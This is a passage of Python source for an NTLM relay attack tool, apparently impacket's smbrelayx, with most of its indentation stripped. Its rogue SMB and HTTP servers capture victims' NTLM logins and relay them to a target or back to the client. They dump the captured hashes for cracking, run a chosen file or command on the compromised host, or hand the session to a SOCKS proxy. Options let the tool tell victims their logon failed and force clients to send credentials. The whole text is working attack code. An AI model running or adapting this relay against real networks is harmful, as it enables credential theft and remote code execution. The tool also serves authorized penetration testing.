request['LogonInformation']['LogonNetworkTransitive']['LmChallengeResponse'] = authenticateMessage['lanman']
authenticator = nrpc.NETLOGON_AUTHENTICATOR()
authenticator['Credential'] = nrpc.ComputeNetlogonCredential(clientStoredCredential, sessionKey)
authenticator['Timestamp'] = 10
request['Authenticator'] = authenticator
request['ReturnAuthenticator']['Credential'] = '\x00'*8
request['ReturnAuthenticator']['Timestamp'] = 0
request['ExtraFlags'] = 0
#request.dump()
try:
resp = dce.request(request)
#resp.dump()
except DCERPCException as e:
logging.debug('Exception:', exc_info=True)
logging.error(str(e))
return e.get_error_code()
logging.info("%s\\%s successfully validated through NETLOGON" % (
domainName, authenticateMessage['user_name'].decode('utf-16le')))
encryptedSessionKey = authenticateMessage['session_key']
if encryptedSessionKey != '':
signingKey = generateEncryptedSessionKey(
resp['ValidationInformation']['ValidationSam4']['UserSessionKey'], encryptedSessionKey)
else:
signingKey = resp['ValidationInformation']['ValidationSam4']['UserSessionKey']
logging.info("SMB Signing key: %s " % hexlify(signingKey))
self.set_session_key(signingKey)
self._SignatureEnabled = True
self._SignSequenceNumber = 2
self.set_flags(flags1 = SMB.FLAGS1_PATHCASELESS, flags2 = SMB.FLAGS2_EXTENDED_SECURITY)
return STATUS_SUCCESS
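    # (Summary of netlogonSessionKey above: it authenticates to the DC's NETLOGON pipe as the
    # supplied machine account, replays the relayed client's challenge/response through
    # NetrLogonSamLogonWithFlags, and derives the SMB signing key from the returned
    # UserSessionKey -- the CVE-2015-0005 technique mentioned in the module header.)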
def sendAuth(self, serverChallenge, authenticateMessageBlob):
smb = NewSMBPacket()
smb['Flags1'] = SMB.FLAGS1_PATHCASELESS
smb['Flags2'] = SMB.FLAGS2_EXTENDED_SECURITY
# Are we required to sign SMB? If so we do it, if not we skip it
if self._SignatureRequired:
smb['Flags2'] |= SMB.FLAGS2_SMB_SECURITY_SIGNATURE
smb['Uid'] = self._uid
sessionSetup = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX)
sessionSetup['Parameters'] = SMBSessionSetupAndX_Extended_Parameters()
sessionSetup['Data'] = SMBSessionSetupAndX_Extended_Data()
sessionSetup['Parameters']['MaxBufferSize'] = 65535
sessionSetup['Parameters']['MaxMpxCount'] = 2
sessionSetup['Parameters']['VcNumber'] = 1
sessionSetup['Parameters']['SessionKey'] = 0
sessionSetup['Parameters']['Capabilities'] = SMB.CAP_EXTENDED_SECURITY | SMB.CAP_USE_NT_ERRORS | SMB.CAP_UNICODE
# Fake Data here, don't want to get us fingerprinted
sessionSetup['Data']['NativeOS'] = 'Unix'
sessionSetup['Data']['NativeLanMan'] = 'Samba'
sessionSetup['Parameters']['SecurityBlobLength'] = len(authenticateMessageBlob)
sessionSetup['Data']['SecurityBlob'] = authenticateMessageBlob
smb.addCommand(sessionSetup)
self.sendSMB(smb)
smb = self.recvSMB()
errorCode = smb['ErrorCode'] << 16
errorCode += smb['_reserved'] << 8
errorCode += smb['ErrorClass']
if errorCode == STATUS_SUCCESS and self._SignatureRequired is True and self.domainIp is not None:
try:
errorCode = self.netlogonSessionKey(serverChallenge, authenticateMessageBlob)
except:
logging.debug('Exception:', exc_info=True)
raise
return smb, errorCode
def sendNegotiate(self, negotiateMessage):
smb = NewSMBPacket()
smb['Flags1'] = SMB.FLAGS1_PATHCASELESS
smb['Flags2'] = SMB.FLAGS2_EXTENDED_SECURITY
# Are we required to sign SMB? If so we do it, if not we skip it
if self._SignatureRequired:
smb['Flags2'] |= SMB.FLAGS2_SMB_SECURITY_SIGNATURE
sessionSetup = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX)
sessionSetup['Parameters'] = SMBSessionSetupAndX_Extended_Parameters()
sessionSetup['Data'] = SMBSessionSetupAndX_Extended_Data()
sessionSetup['Parameters']['MaxBufferSize'] = 65535
sessionSetup['Parameters']['MaxMpxCount'] = 2
sessionSetup['Parameters']['VcNumber'] = 1
sessionSetup['Parameters']['SessionKey'] = 0
sessionSetup['Parameters']['Capabilities'] = SMB.CAP_EXTENDED_SECURITY | SMB.CAP_USE_NT_ERRORS | SMB.CAP_UNICODE
# Let's build a NegTokenInit with the NTLMSSP
# TODO: In the future we should be able to choose different providers
blob = SPNEGO_NegTokenInit()
# NTLMSSP
blob['MechTypes'] = [TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']]
blob['MechToken'] = negotiateMessage
sessionSetup['Parameters']['SecurityBlobLength'] = len(blob)
sessionSetup['Parameters'].getData()
sessionSetup['Data']['SecurityBlob'] = blob.getData()
# Fake Data here, don't want to get us fingerprinted
sessionSetup['Data']['NativeOS'] = 'Unix'
sessionSetup['Data']['NativeLanMan'] = 'Samba'
smb.addCommand(sessionSetup)
self.sendSMB(smb)
smb = self.recvSMB()
try:
smb.isValidAnswer(SMB.SMB_COM_SESSION_SETUP_ANDX)
except Exception:
logging.error("SessionSetup Error!")
raise
else:
# We will need to use this uid field for all future requests/responses
self._uid = smb['Uid']
# Now we have to extract the blob to continue the auth process
sessionResponse = SMBCommand(smb['Data'][0])
sessionParameters = SMBSessionSetupAndX_Extended_Response_Parameters(sessionResponse['Parameters'])
sessionData = SMBSessionSetupAndX_Extended_Response_Data(flags = smb['Flags2'])
sessionData['SecurityBlobLength'] = sessionParameters['SecurityBlobLength']
sessionData.fromString(sessionResponse['Data'])
respToken = SPNEGO_NegTokenResp(sessionData['SecurityBlob'])
return respToken['ResponseToken']
class HTTPRelayServer(Thread):
class HTTPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
def __init__(self, server_address, RequestHandlerClass, target, exeFile, command, mode, outputFile,
one_shot, returnStatus=STATUS_SUCCESS, runSocks = False):
self.target = target
self.exeFile = exeFile
self.command = command
self.mode = mode
self.returnStatus = returnStatus
self.outputFile = outputFile
self.one_shot = one_shot
self.runSocks = runSocks
socketserver.TCPServer.__init__(self,server_address, RequestHandlerClass)
class HTTPHandler(http.server.SimpleHTTPRequestHandler):
def __init__(self,request, client_address, server):
self.server = server
self.protocol_version = 'HTTP/1.1'
self.challengeMessage = None
self.target = None
self.client = None
self.machineAccount = None
self.machineHashes = None
self.domainIp = None
global ATTACKED_HOSTS
if self.server.target in ATTACKED_HOSTS and self.server.one_shot:
logging.info(
"HTTPD: Received connection from %s, skipping %s, already attacked" % (
client_address[0], self.server.target))
return
if self.server.target is not None:
logging.info(
"HTTPD: Received connection from %s, attacking target %s" % (client_address[0], self.server.target))
else:
logging.info(
"HTTPD: Received connection from %s, attacking target %s" % (client_address[0], client_address[0]))
http.server.SimpleHTTPRequestHandler.__init__(self,request, client_address, server)
def handle_one_request(self):
try:
http.server.SimpleHTTPRequestHandler.handle_one_request(self)
except Exception:
logging.debug("Exception:", exc_info=True)
pass
def log_message(self, format, *args):
return
def do_HEAD(self):
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
def do_AUTHHEAD(self, message = ''):
self.send_response(401)
self.send_header('WWW-Authenticate', message.decode('utf-8'))
self.send_header('Content-type', 'text/html')
self.send_header('Content-Length','0')
self.end_headers()
def send_error(self, code, message=None):
            if message.find('RPC_OUT') >= 0 or message.find('RPC_IN') >= 0:
return self.do_GET()
return http.server.SimpleHTTPRequestHandler.send_error(self,code,message)
def do_GET(self):
messageType = 0
if PY2:
authorizationHeader = self.headers.getheader('Authorization')
else:
authorizationHeader = self.headers.get('Authorization')
if authorizationHeader is None:
self.do_AUTHHEAD(message = b'NTLM')
pass
else:
#self.do_AUTHHEAD()
typeX = authorizationHeader
try:
_, blob = typeX.split('NTLM')
token = base64.b64decode(blob.strip())
except:
self.do_AUTHHEAD()
messageType = unpack('<L',token[len('NTLMSSP\x00'):len('NTLMSSP\x00')+4])[0]
if messageType == 1:
if self.server.mode.upper() == 'REFLECTION':
self.target = self.client_address[0]
else:
self.target = self.server.target
try:
if self.client is not None:
logging.error('Still performing an attack against %s' % self.client.get_remote_host())
self.send_response(404)
self.end_headers()
return
self.client = SMBClient(self.target, extended_security = True)
self.client.setDomainAccount(self.machineAccount, self.machineHashes, self.domainIp)
self.client.set_timeout(60)
except Exception as e:
logging.error("Connection against target %s FAILED" % self.target)
logging.error(str(e))
clientChallengeMessage = self.client.sendNegotiate(token)
self.challengeMessage = NTLMAuthChallenge()
self.challengeMessage.fromString(clientChallengeMessage)
self.do_AUTHHEAD(message = b'NTLM '+base64.b64encode(clientChallengeMessage))
elif messageType == 3:
authenticateMessage = NTLMAuthChallengeResponse()
authenticateMessage.fromString(token)
if authenticateMessage['user_name'] != '' or self.target == '127.0.0.1':
respToken2 = SPNEGO_NegTokenResp()
respToken2['ResponseToken'] = token
clientResponse, errorCode = self.client.sendAuth(self.challengeMessage['challenge'],
respToken2.getData())
else:
# Anonymous login, send STATUS_ACCESS_DENIED so we force the client to send his credentials, except
# when coming from localhost
errorCode = STATUS_ACCESS_DENIED
if errorCode != STATUS_SUCCESS:
logging.error("Authenticating against %s as %s\\%s FAILED" % (
self.target, authenticateMessage['domain_name'].decode('utf-16le'), authenticateMessage['user_name'].decode('utf-16le')))
                        self.do_AUTHHEAD(b'NTLM')
else:
# Relay worked, do whatever we want here...
logging.info("Authenticating against %s as %s\\%s SUCCEED" % (
self.target, authenticateMessage['domain_name'].decode('utf-16le'), authenticateMessage['user_name'].decode('utf-16le')))
ntlm_hash_data = outputToJohnFormat(self.challengeMessage['challenge'],
authenticateMessage['user_name'],
authenticateMessage['domain_name'],
authenticateMessage['lanman'], authenticateMessage['ntlm'])
logging.info(ntlm_hash_data['hash_string'])
if self.server.outputFile is not None:
writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'],
self.server.outputFile)
# Target will be attacked, adding to the attacked set
                        # If the attack fails, the doAttack thread will be responsible for removing it from the set
global ATTACKED_HOSTS
if self.target not in ATTACKED_HOSTS:
ATTACKED_HOSTS.add(self.target)
if self.server.runSocks is True:
# Pass all the data to the socksplugins proxy
protocolClient = SMBRelayClient(None,urlparse('smb://%s' % self.target))
protocolClient.session = SMBConnection(existingConnection=self.client)
activeConnections.put(
(self.target, 445, 'SMB', ('%s/%s' % (
authenticateMessage['domain_name'].decode('utf-16le'),
authenticateMessage['user_name'].decode('utf-16le'))).upper(),
protocolClient,
{'CHALLENGE_MESSAGE': self.challengeMessage}))
logging.info("Adding %s(445) to active SOCKS connection. Enjoy" % self.target)
else:
clientThread = doAttack(self.client,self.server.exeFile,self.server.command)
self.client = None
clientThread.start()
else:
                            logging.error('%s is being attacked at the moment, skipping.. ' % self.target)
# And answer 404 not found
self.send_response(404)
self.send_header('WWW-Authenticate', 'NTLM')
self.send_header('Content-type', 'text/html')
self.send_header('Content-Length','0')
self.end_headers()
return
def __init__(self, outputFile=None):
Thread.__init__(self)
self.daemon = True
self.domainIp = None
self.machineAccount = None
self.machineHashes = None
self.exeFile = None
self.command = None
self.target = None
self.mode = None
self.outputFile = outputFile
self.one_shot = False
self.runSocks = False
def setTargets(self, target):
self.target = target
def setExeFile(self, filename):
self.exeFile = filename
def setCommand(self, command):
self.command = command
def setSocks(self, socks):
self.runSocks = socks
def setReturnStatus(self, returnStatus):
# Not implemented yet.
pass
def setMode(self,mode, one_shot):
self.mode = mode
self.one_shot = one_shot
def setDomainAccount( self, machineAccount, machineHashes, domainIp):
self.machineAccount = machineAccount
self.machineHashes = machineHashes
self.domainIp = domainIp
def run(self):
logging.info("Setting up HTTP Server")
httpd = self.HTTPServer(("", 80), self.HTTPHandler, self.target, self.exeFile, self.command, self.mode,
self.outputFile, self.one_shot, runSocks = self.runSocks)
httpd.serve_forever()
class SMBRelayServer(Thread):
def __init__(self, outputFile = None):
Thread.__init__(self)
self.daemon = True
self.server = 0
self.target = ''
self.mode = 'REFLECTION'
self.domainIp = None
self.machineAccount = None
self.machineHashes = None
self.exeFile = None
self.returnStatus = STATUS_SUCCESS
self.command = None
self.one_shot = False
self.runSocks = False
# Here we write a mini config for the server
smbConfig = ConfigParser.ConfigParser()
smbConfig.add_section('global')
smbConfig.set('global','server_name','server_name')
smbConfig.set('global','server_os','UNIX')
smbConfig.set('global','server_domain','WORKGROUP')
smbConfig.set('global','log_file','smb.log')
smbConfig.set('global','credentials_file','')
if outputFile is not None:
smbConfig.set('global','jtr_dump_path',outputFile)
# IPC always needed
smbConfig.add_section('IPC$')
smbConfig.set('IPC$','comment','')
smbConfig.set('IPC$','read only','yes')
smbConfig.set('IPC$','share type','3')
smbConfig.set('IPC$','path','')
self.server = SMBSERVER(('0.0.0.0',445), config_parser = smbConfig)
self.server.processConfigFile()
self.origSmbComNegotiate = self.server.hookSmbCommand(SMB.SMB_COM_NEGOTIATE, self.SmbComNegotiate)
self.origSmbSessionSetupAndX = self.server.hookSmbCommand(SMB.SMB_COM_SESSION_SETUP_ANDX,
self.SmbSessionSetupAndX)
# Let's use the SMBServer Connection dictionary to keep track of our client connections as well
self.server.addConnection('SMBRelay', '0.0.0.0', 445)
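    # (The two hooks registered above intercept the NEGOTIATE and SESSION_SETUP_ANDX commands,
    # and the extra 'SMBRelay' connection entry is reused as a shared dictionary that keeps
    # track of the outbound SMBClient instances, one per relay target.)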
def SmbComNegotiate(self, connId, smbServer, SMBCommand, recvPacket):
connData = smbServer.getConnectionData(connId, checkStatus = False)
if self.mode.upper() == 'REFLECTION':
self.target = connData['ClientIP']
#############################################################
# SMBRelay
smbData = smbServer.getConnectionData('SMBRelay', False)
if self.target in smbData:
# Remove the previous connection and use the last one
smbClient = smbData[self.target]['SMBClient']
del smbClient
del smbData[self.target]
# Let's check if we already attacked this host.
global ATTACKED_HOSTS
if self.target in ATTACKED_HOSTS and self.one_shot is True:
logging.info("SMBD: Received connection from %s, skipping %s, already attacked" % (
connData['ClientIP'], self.target))
packet = NewSMBPacket()
packet['Flags1'] = SMB.FLAGS1_REPLY
packet['Flags2'] = SMB.FLAGS2_NT_STATUS
packet['Command'] = recvPacket['Command']
packet['Pid'] = recvPacket['Pid']
packet['Tid'] = recvPacket['Tid']
packet['Mid'] = recvPacket['Mid']
packet['Uid'] = recvPacket['Uid']
packet['Data'] = '\x00\x00\x00'
errorCode = STATUS_NOT_SUPPORTED
packet['ErrorCode'] = errorCode >> 16
packet['ErrorClass'] = errorCode & 0xff
return None, [packet], STATUS_NOT_SUPPORTED
else:
logging.info("SMBD: Received connection from %s, attacking target %s" % (connData['ClientIP'] ,self.target))
try:
if recvPacket['Flags2'] & SMB.FLAGS2_EXTENDED_SECURITY == 0:
extSec = False
else:
if self.mode.upper() == 'REFLECTION':
# Force standard security when doing reflection
logging.info("Downgrading to standard security")
extSec = False
recvPacket['Flags2'] += (~SMB.FLAGS2_EXTENDED_SECURITY)
else:
extSec = True
client = SMBClient(self.target, extended_security = extSec)
client.setDomainAccount(self.machineAccount, self.machineHashes, self.domainIp)
client.set_timeout(60)
except Exception as e:
logging.error("Connection against target %s FAILED" % self.target)
logging.error(str(e))
else:
encryptionKey = client.get_encryption_key()
smbData[self.target] = {}
smbData[self.target]['SMBClient'] = client
if encryptionKey is not None:
connData['EncryptionKey'] = encryptionKey
smbServer.setConnectionData('SMBRelay', smbData)
smbServer.setConnectionData(connId, connData)
return self.origSmbComNegotiate(connId, smbServer, SMBCommand, recvPacket)
#############################################################
def SmbSessionSetupAndX(self, connId, smbServer, smbCommand, recvPacket):
connData = smbServer.getConnectionData(connId, checkStatus = False)
#############################################################
# SMBRelay
smbData = smbServer.getConnectionData('SMBRelay', False)
#############################################################
respSMBCommand = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX)
global ATTACKED_HOSTS
if connData['_dialects_parameters']['Capabilities'] & SMB.CAP_EXTENDED_SECURITY:
# Extended security. Here we deal with all SPNEGO stuff
respParameters = SMBSessionSetupAndX_Extended_Response_Parameters()
respData = SMBSessionSetupAndX_Extended_Response_Data()
sessionSetupParameters = SMBSessionSetupAndX_Extended_Parameters(smbCommand['Parameters'])
sessionSetupData = SMBSessionSetupAndX_Extended_Data()
sessionSetupData['SecurityBlobLength'] = sessionSetupParameters['SecurityBlobLength']
sessionSetupData.fromString(smbCommand['Data'])
connData['Capabilities'] = sessionSetupParameters['Capabilities']
if unpack('B',sessionSetupData['SecurityBlob'][0:1])[0] != ASN1_AID:
                # If there's no GSSAPI ID, it must be an AUTH packet
blob = SPNEGO_NegTokenResp(sessionSetupData['SecurityBlob'])
token = blob['ResponseToken']
else:
# NEGOTIATE packet
blob = SPNEGO_NegTokenInit(sessionSetupData['SecurityBlob'])
token = blob['MechToken']
            # Here we only handle NTLMSSP; depending on what stage of the
            # authentication we are at, we act on it
messageType = unpack('<L',token[len('NTLMSSP\x00'):len('NTLMSSP\x00')+4])[0]
if messageType == 0x01:
# NEGOTIATE_MESSAGE
negotiateMessage = NTLMAuthNegotiate()
negotiateMessage.fromString(token)
# Let's store it in the connection data
connData['NEGOTIATE_MESSAGE'] = negotiateMessage
#############################################################
# SMBRelay: Ok.. So we got a NEGOTIATE_MESSAGE from a client.
# Let's send it to the target server and send the answer back to the client.
# Let's check if we already attacked this host.
global ATTACKED_HOSTS
if self.target in ATTACKED_HOSTS and self.one_shot is True:
logging.info("SMBD: Received connection from %s, skipping %s, already attacked" % (
connData['ClientIP'], self.target))
packet = NewSMBPacket()
packet['Flags1'] = SMB.FLAGS1_REPLY
packet['Flags2'] = SMB.FLAGS2_NT_STATUS
packet['Command'] = recvPacket['Command']
packet['Pid'] = recvPacket['Pid']
packet['Tid'] = recvPacket['Tid']
packet['Mid'] = recvPacket['Mid']
packet['Uid'] = recvPacket['Uid']
packet['Data'] = b'\x00\x00\x00'
errorCode = STATUS_NOT_SUPPORTED
packet['ErrorCode'] = errorCode >> 16
packet['ErrorClass'] = errorCode & 0xff
return None, [packet], STATUS_NOT_SUPPORTED
# It might happen if the target connects back before a previous connection has finished, we might
# get to this function w/o having the dict and smbClient entry created, because a
# NEGOTIATE_CONNECTION was not needed
if (self.target in smbData) is False:
smbData[self.target] = {}
smbClient = SMBClient(self.target)
smbClient.setDomainAccount(self.machineAccount, self.machineHashes, self.domainIp)
smbClient.set_timeout(60)
smbData[self.target]['SMBClient'] = smbClient
smbClient = smbData[self.target]['SMBClient']
clientChallengeMessage = smbClient.sendNegotiate(token)
challengeMessage = NTLMAuthChallenge()
challengeMessage.fromString(clientChallengeMessage)
#############################################################
respToken = SPNEGO_NegTokenResp()
# accept-incomplete. We want more data
respToken['NegResult'] = b'\x01'
respToken['SupportedMech'] = TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']
respToken['ResponseToken'] = challengeMessage.getData()
# Setting the packet to STATUS_MORE_PROCESSING
errorCode = STATUS_MORE_PROCESSING_REQUIRED
# Let's set up an UID for this connection and store it
# in the connection's data
# Picking a fixed value
# TODO: Manage more UIDs for the same session
connData['Uid'] = 10
# Let's store it in the connection data
connData['CHALLENGE_MESSAGE'] = challengeMessage
elif messageType == 0x03:
# AUTHENTICATE_MESSAGE, here we deal with authentication
#############################################################
                # SMBRelay: Ok, so now we have the Auth token, let's send it
# back to the target system and hope for the best.
smbClient = smbData[self.target]['SMBClient']
authenticateMessage = NTLMAuthChallengeResponse()
authenticateMessage.fromString(token)
if authenticateMessage['user_name'] != '':
clientResponse, errorCode = smbClient.sendAuth(connData['CHALLENGE_MESSAGE']['challenge'],
sessionSetupData['SecurityBlob'])
else:
# Anonymous login, send STATUS_ACCESS_DENIED so we force the client to send his credentials
errorCode = STATUS_ACCESS_DENIED
if errorCode != STATUS_SUCCESS:
# Let's return what the target returned, hope the client connects back again
packet = NewSMBPacket()
packet['Flags1'] = SMB.FLAGS1_REPLY | SMB.FLAGS1_PATHCASELESS
packet['Flags2'] = SMB.FLAGS2_NT_STATUS | SMB.FLAGS2_EXTENDED_SECURITY
packet['Command'] = recvPacket['Command']
packet['Pid'] = recvPacket['Pid']
packet['Tid'] = recvPacket['Tid']
packet['Mid'] = recvPacket['Mid']
packet['Uid'] = recvPacket['Uid']
packet['Data'] = b'\x00\x00\x00'
packet['ErrorCode'] = errorCode >> 16
packet['ErrorClass'] = errorCode & 0xff
# Reset the UID
smbClient.setUid(0)
logging.error("Authenticating against %s as %s\\%s FAILED" % (
self.target, authenticateMessage['domain_name'].decode('utf-16le'), authenticateMessage['user_name'].decode('utf-16le')))
# del (smbData[self.target])
return None, [packet], errorCode
else:
# We have a session, create a thread and do whatever we want
logging.info("Authenticating against %s as %s\\%s SUCCEED" % (
self.target, authenticateMessage['domain_name'].decode('utf-16le'), authenticateMessage['user_name'].decode('utf-16le')))
ntlm_hash_data = outputToJohnFormat(connData['CHALLENGE_MESSAGE']['challenge'],
authenticateMessage['user_name'],
authenticateMessage['domain_name'],
authenticateMessage['lanman'], authenticateMessage['ntlm'])
logging.info(ntlm_hash_data['hash_string'])
if self.server.getJTRdumpPath() != '':
writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'],
self.server.getJTRdumpPath())
# Target will be attacked, adding to the attacked set
                    # If the attack fails, the doAttack thread will be responsible for removing it from the set
ATTACKED_HOSTS.add(self.target)
if self.runSocks is True:
# Pass all the data to the socksplugins proxy
protocolClient = SMBRelayClient(None, urlparse('smb://%s' % self.target))
protocolClient.session = SMBConnection(existingConnection=smbClient)
activeConnections.put((self.target, 445, 'SMB',
('%s/%s' % (
authenticateMessage['domain_name'].decode('utf-16le'),
authenticateMessage['user_name'].decode('utf-16le'))).upper(),
protocolClient, connData))
logging.info("Adding %s(445) to active SOCKS connection. Enjoy" % self.target)
del (smbData[self.target])
else:
del (smbData[self.target])
clientThread = doAttack(smbClient,self.exeFile,self.command)
clientThread.start()
# Now continue with the server
#############################################################
# Return status code of the authentication process.
errorCode = self.returnStatus
logging.info("Sending status code %s after authentication to %s" % (
ERROR_MESSAGES[self.returnStatus][0], connData['ClientIP']))
respToken = SPNEGO_NegTokenResp()
# accept-completed
respToken['NegResult'] = b'\x00'
# Status SUCCESS
# Let's store it in the connection data
connData['AUTHENTICATE_MESSAGE'] = authenticateMessage
else:
raise Exception("Unknown NTLMSSP MessageType %d" % messageType)
respParameters['SecurityBlobLength'] = len(respToken)
respData['SecurityBlobLength'] = respParameters['SecurityBlobLength']
respData['SecurityBlob'] = respToken.getData()
else:
# Process Standard Security
respParameters = SMBSessionSetupAndXResponse_Parameters()
respData = SMBSessionSetupAndXResponse_Data()
sessionSetupParameters = SMBSessionSetupAndX_Parameters(smbCommand['Parameters'])
sessionSetupData = SMBSessionSetupAndX_Data()
sessionSetupData['AnsiPwdLength'] = sessionSetupParameters['AnsiPwdLength']
sessionSetupData['UnicodePwdLength'] = sessionSetupParameters['UnicodePwdLength']
sessionSetupData.fromString(smbCommand['Data'])
connData['Capabilities'] = sessionSetupParameters['Capabilities']
#############################################################
# SMBRelay
smbClient = smbData[self.target]['SMBClient']
if sessionSetupData['Account'] != '':
clientResponse, errorCode = smbClient.login_standard(sessionSetupData['Account'],
sessionSetupData['PrimaryDomain'],
sessionSetupData['AnsiPwd'],
sessionSetupData['UnicodePwd'])
else:
# Anonymous login, send STATUS_ACCESS_DENIED so we force the client to send his credentials
errorCode = STATUS_ACCESS_DENIED
if errorCode != STATUS_SUCCESS:
# Let's return what the target returned, hope the client connects back again
packet = NewSMBPacket()
packet['Flags1'] = SMB.FLAGS1_REPLY | SMB.FLAGS1_PATHCASELESS
packet['Flags2'] = SMB.FLAGS2_NT_STATUS | SMB.FLAGS2_EXTENDED_SECURITY
packet['Command'] = recvPacket['Command']
packet['Pid'] = recvPacket['Pid']
packet['Tid'] = recvPacket['Tid']
packet['Mid'] = recvPacket['Mid']
packet['Uid'] = recvPacket['Uid']
packet['Data'] = '\x00\x00\x00'
packet['ErrorCode'] = errorCode >> 16
packet['ErrorClass'] = errorCode & 0xff
# Reset the UID
smbClient.setUid(0)
return None, [packet], errorCode
# Now continue with the server
else:
# We have a session, create a thread and do whatever we want
ntlm_hash_data = outputToJohnFormat(b'', sessionSetupData['Account'], sessionSetupData['PrimaryDomain'],
sessionSetupData['AnsiPwd'], sessionSetupData['UnicodePwd'])
logging.info(ntlm_hash_data['hash_string'])
if self.server.getJTRdumpPath() != '':
writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'],
self.server.getJTRdumpPath())
# Target will be attacked, adding to the attacked set
                # If the attack fails, the doAttack thread will be responsible for removing it from the set
ATTACKED_HOSTS.add(self.target)
if self.runSocks is True:
# Pass all the data to the socksplugins proxy
protocolClient = SMBRelayClient(None, urlparse('smb://%s' % self.target))
protocolClient.session = SMBConnection(existingConnection=smbClient)
activeConnections.put((self.target, 445, 'SMB',
('%s/%s' % (
sessionSetupData['PrimaryDomain'],
sessionSetupData['Account'])).upper(),
protocolClient, connData))
logging.info("Adding %s(445) to active SOCKS connection. Enjoy" % self.target)
# Remove the target server from our connection list, the work is done
del (smbData[self.target])
else:
# Remove the target server from our connection list, the work is done
del (smbData[self.target])
clientThread = doAttack(smbClient, self.exeFile, self.command)
clientThread.start()
# Now continue with the server
#############################################################
            # Do the verification here; for now we just grant access
# TODO: Manage more UIDs for the same session
errorCode = self.returnStatus
logging.info("Sending status code %s after authentication to %s" % (
ERROR_MESSAGES[self.returnStatus][0], connData['ClientIP']))
connData['Uid'] = 10
respParameters['Action'] = 0
respData['NativeOS'] = smbServer.getServerOS()
respData['NativeLanMan'] = smbServer.getServerOS()
respSMBCommand['Parameters'] = respParameters
respSMBCommand['Data'] = respData
# From now on, the client can ask for other commands
connData['Authenticated'] = True
#############################################################
# SMBRelay
smbServer.setConnectionData('SMBRelay', smbData)
#############################################################
smbServer.setConnectionData(connId, connData)
return [respSMBCommand], None, errorCode
def _start(self):
self.server.serve_forever()
def run(self):
logging.info("Setting up SMB Server")
self._start()
def setTargets(self, targets):
self.target = targets
def setExeFile(self, filename):
self.exeFile = filename
def setCommand(self, command):
self.command = command
def setSocks(self, socks):
self.runSocks = socks
def setReturnStatus(self, returnStatus):
        # Specifies the return status to send back to the connecting client after a
        # successful relayed authentication. This comes in handy when we don't want the
        # connecting client to store successful credentials in its memory. Valid statuses:
        # STATUS_SUCCESS - denotes that the connecting client passed valid credentials,
        #                  which will make it store them accordingly.
        # STATUS_ACCESS_DENIED - may occur for instance when the client is not a Domain Admin
        #                  and Remote UAC is configured, thus preventing connection to ADMIN$
        # STATUS_LOGON_FAILURE - tells the connecting client that the passed credentials
        #                  are invalid.
self.returnStatus = {
'success' : STATUS_SUCCESS,
'denied' : STATUS_ACCESS_DENIED,
'logon_failure' : STATUS_LOGON_FAILURE
}[returnStatus.lower()]
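    # For example, a hypothetical caller holding an SMBRelayServer instance `s` could use
    # s.setReturnStatus('logon_failure') so the victim client is told the credentials were
    # wrong even though the relayed authentication succeeded.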
def setMode(self,mode, one_shot):
self.mode = mode
self.one_shot = one_shot
def setDomainAccount( self, machineAccount, machineHashes, domainIp):
self.machineAccount = machineAccount
self.machineHashes = machineHashes
self.domainIp = domainIp
# Process command-line arguments.
if __name__ == '__main__':
RELAY_SERVERS = ( SMBRelayServer, HTTPRelayServer )
print(version.BANNER)
parser = argparse.ArgumentParser(add_help=False,
description="For every connection received, this module will try to SMB relay that "
" connection to the target system or the original client")
parser.add_argument("--help", action="help", help='show this help message and exit')
parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
parser.add_argument('-h', action='store', metavar='HOST',
                        help='Host to relay the credentials to; if not specified, they will be relayed back to the client')
parser.add_argument('-s', action='store', choices={'success', 'denied', 'logon_failure'}, default='success',
help='Status to return after client performed authentication. Default: "success".')
parser.add_argument('-e', action='store', required=False, metavar='FILE',
help='File to execute on the target system. If not specified, hashes will be dumped '
'(secretsdump.py must be in the same directory)')
parser.add_argument('-c', action='store', type=str, required=False, metavar='COMMAND',
help='Command to execute on target system. If not specified, hashes will be dumped '
'(secretsdump.py must be in the same directory)')
parser.add_argument('-socks', action='store_true', default=False,
help='Launch a SOCKS proxy for the connection relayed')
parser.add_argument('-one-shot', action='store_true', default=False,
help='After successful authentication, only execute the attack once for each target')
parser.add_argument('-codec', action='store', help='Sets encoding used (codec) from the target\'s output (default '
'"%s"). If errors are detected, run chcp.com at the target, '
'map the result with '
'https://docs.python.org/3/library/codecs.html#standard-encodings and then execute smbrelayx.py '
'again with -codec and the corresponding codec ' % CODEC)
parser.add_argument('-outputfile', action='store',
help='base output filename for encrypted hashes. Suffixes will be added for ntlm and ntlmv2')
parser.add_argument('-machine-account', action='store', required=False,
help='Domain machine account to use when interacting with the domain to grab a session key for '
'signing, format is domain/machine_name')
parser.add_argument('-machine-hashes', action="store", metavar="LMHASH:NTHASH",
help='Domain machine hashes, format is LMHASH:NTHASH')
parser.add_argument('-domain', action="store", help='Domain FQDN or IP to connect using NETLOGON')
try:
options = parser.parse_args()
except Exception as e:
logging.error(str(e))
sys.exit(1)
# Init the example's logger theme
logger.init(options.ts)
if options.codec is not None:
CODEC = options.codec
if options.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
# Print the Library's installation path
logging.debug(version.getInstallationPath())
else:
logging.getLogger().setLevel(logging.INFO)
logging.getLogger('impacket.smbserver').setLevel(logging.ERROR)
if options.h is not None:
logging.info("Running in relay mode")
mode = 'RELAY'
targetSystem = options.h
else:
logging.info("Running in reflection mode")
targetSystem = None
mode = 'REFLECTION'
exeFile = options.e
Command = options.c
returnStatus = options.s
threads = set()
if options.socks is True:
# Start a SOCKS proxy in the background
s1 = SOCKS()
socks_thread = Thread(target=s1.serve_forever)
socks_thread.daemon = True
socks_thread.start()
threads.add(socks_thread)
for server in RELAY_SERVERS:
s = server(options.outputfile)
s.setTargets(targetSystem)
s.setExeFile(exeFile)
s.setCommand(Command)
s.setSocks(options.socks)
s.setReturnStatus(returnStatus)
